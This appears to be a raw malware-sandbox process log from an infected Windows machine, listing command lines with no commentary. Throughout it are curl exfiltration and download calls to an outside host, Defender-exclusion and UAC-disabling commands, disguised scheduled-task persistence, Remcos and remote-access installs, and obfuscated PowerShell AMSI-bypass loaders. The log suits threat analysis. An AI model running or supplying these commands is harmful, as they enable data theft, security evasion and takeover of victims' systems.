curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp100.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp100.tmp.bat
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\0RQI589Z58YU" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp1D83.tmp"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CgQTGPodzTyw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZyEeawiuPnMRLX,[Parameter(Position=1)][Type]$wSfwjGIeCy)$ManiboOSoeP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+'ec'+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+''+'l'+'e'+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+'g'+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+'lic'+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$ManiboOSoeP.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZyEeawiuPnMRLX).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ManiboOSoeP.DefineMethod(''+[Char](73)+'nv'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$wSfwjGIeCy,$ZyEeawiuPnMRLX).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ManiboOSoeP.CreateType();}$haNXAJHTYwclt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'oso'+[Char](102)+''+[Char](116)+'.'+'W'+'in'+[Char](51)+''+[Char](50)+'.U'+[Char](110)+''+'s'+'a'+[Char](102)+''+'e'+''+'N'+''+'a'+''+'t'+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$NrGAxwwLFLqQyk=$haNXAJHTYwclt.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'St'+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kdSiEeEamrpeWmNNzBq=CgQTGPodzTyw @([String])([IntPtr]);$DPejLfzLLASsBslOMGwLeo=CgQTGPodzTyw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WYKDbrTpXIs=$haNXAJHTYwclt.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+'ul'+[Char](101)+''+'H'+''+[Char](97)+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$jrOgFUmnXPKbva=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$WYKDbrTpXIs,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$ZwTtPthojZALcyERC=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$WYKDbrTpXIs,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+'e'+'c'+''+[Char](116)+'')));$SDmQSZZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jrOgFUmnXPKbva,$kdSiEeEamrpeWmNNzBq).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$QKqkiscBHXNBPBDjP=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$SDmQSZZ,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$wBiidsCSDH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZwTtPthojZALcyERC,$DPejLfzLLASsBslOMGwLeo).Invoke($QKqkiscBHXNBPBDjP,[uint32]8,4,[ref]$wBiidsCSDH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QKqkiscBHXNBPBDjP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZwTtPthojZALcyERC,$DPejLfzLLASsBslOMGwLeo).Invoke($QKqkiscBHXNBPBDjP,[uint32]8,0x20,[ref]$wBiidsCSDH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+'E').GetValue('r'+[Char](117)+''+'t'+''+[Char](115)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{fe9f5556-1e34-42c8-89ab-afa746c397ba}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VtjvVificAJN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kusngmbREwjGSW,[Parameter(Position=1)][Type]$XKFbtELJBS)$NuEpGtSOYnb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+'t'+''+'e'+''+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+''+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+'o'+''+[Char](67)+'la'+[Char](115)+'s',[MulticastDelegate]);$NuEpGtSOYnb.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$kusngmbREwjGSW).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');$NuEpGtSOYnb.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$XKFbtELJBS,$kusngmbREwjGSW).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $NuEpGtSOYnb.CreateType();}$QUUJzFBntxEji=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+'dl'+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+''+'r'+'osof'+'t'+'.W'+'i'+'n32'+'.'+''+'U'+'ns'+[Char](97)+'feNa'+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$poHHlZzMgJrisA=$QUUJzFBntxEji.GetMethod('G'+'e'+''+'t'+''+[Char](80)+'r'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ddbBMYDeVLMDspmiqfV=VtjvVificAJN @([String])([IntPtr]);$zNuQqnyONNTRQeuOxEpjTL=VtjvVificAJN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SwUOmIepTyu=$QUUJzFBntxEji.GetMethod(''+'G'+'et'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'H'+'a'+'n'+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$ksSzcCsHSskmhO=$poHHlZzMgJrisA.Invoke($Null,@([Object]$SwUOmIepTyu,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'ra'+[Char](114)+''+[Char](121)+''+'A'+'')));$XCULVGkXQfUkHqulO=$poHHlZzMgJrisA.Invoke($Null,@([Object]$SwUOmIepTyu,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+'l'+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$yIAjRrv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ksSzcCsHSskmhO,$ddbBMYDeVLMDspmiqfV).Invoke(''+'a'+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$lkSFLrDnoeSGJBDey=$poHHlZzMgJrisA.Invoke($Null,@([Object]$yIAjRrv,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$nAxVBtUsVE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XCULVGkXQfUkHqulO,$zNuQqnyONNTRQeuOxEpjTL).Invoke($lkSFLrDnoeSGJBDey,[uint32]8,4,[ref]$nAxVBtUsVE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lkSFLrDnoeSGJBDey,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XCULVGkXQfUkHqulO,$zNuQqnyONNTRQeuOxEpjTL).Invoke($lkSFLrDnoeSGJBDey,[uint32]8,0x20,[ref]$nAxVBtUsVE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+'W'+''+'A'+''+'R'+'E').GetValue(''+[Char](114)+''+[Char](117)+''+[Char](116)+'s'+[Char](115)+''+[Char](116)+''+'a'+'ge'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 5732 -ip 5732
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5732 -s 1512
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 528 -p 1652 -ip 1652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5608 -ip 5608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 884
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1652 -s 2132
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Users\Admin\AppData\Local\Temp\rascqn.exe
"C:\Users\Admin\AppData\Local\Temp\rascqn.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
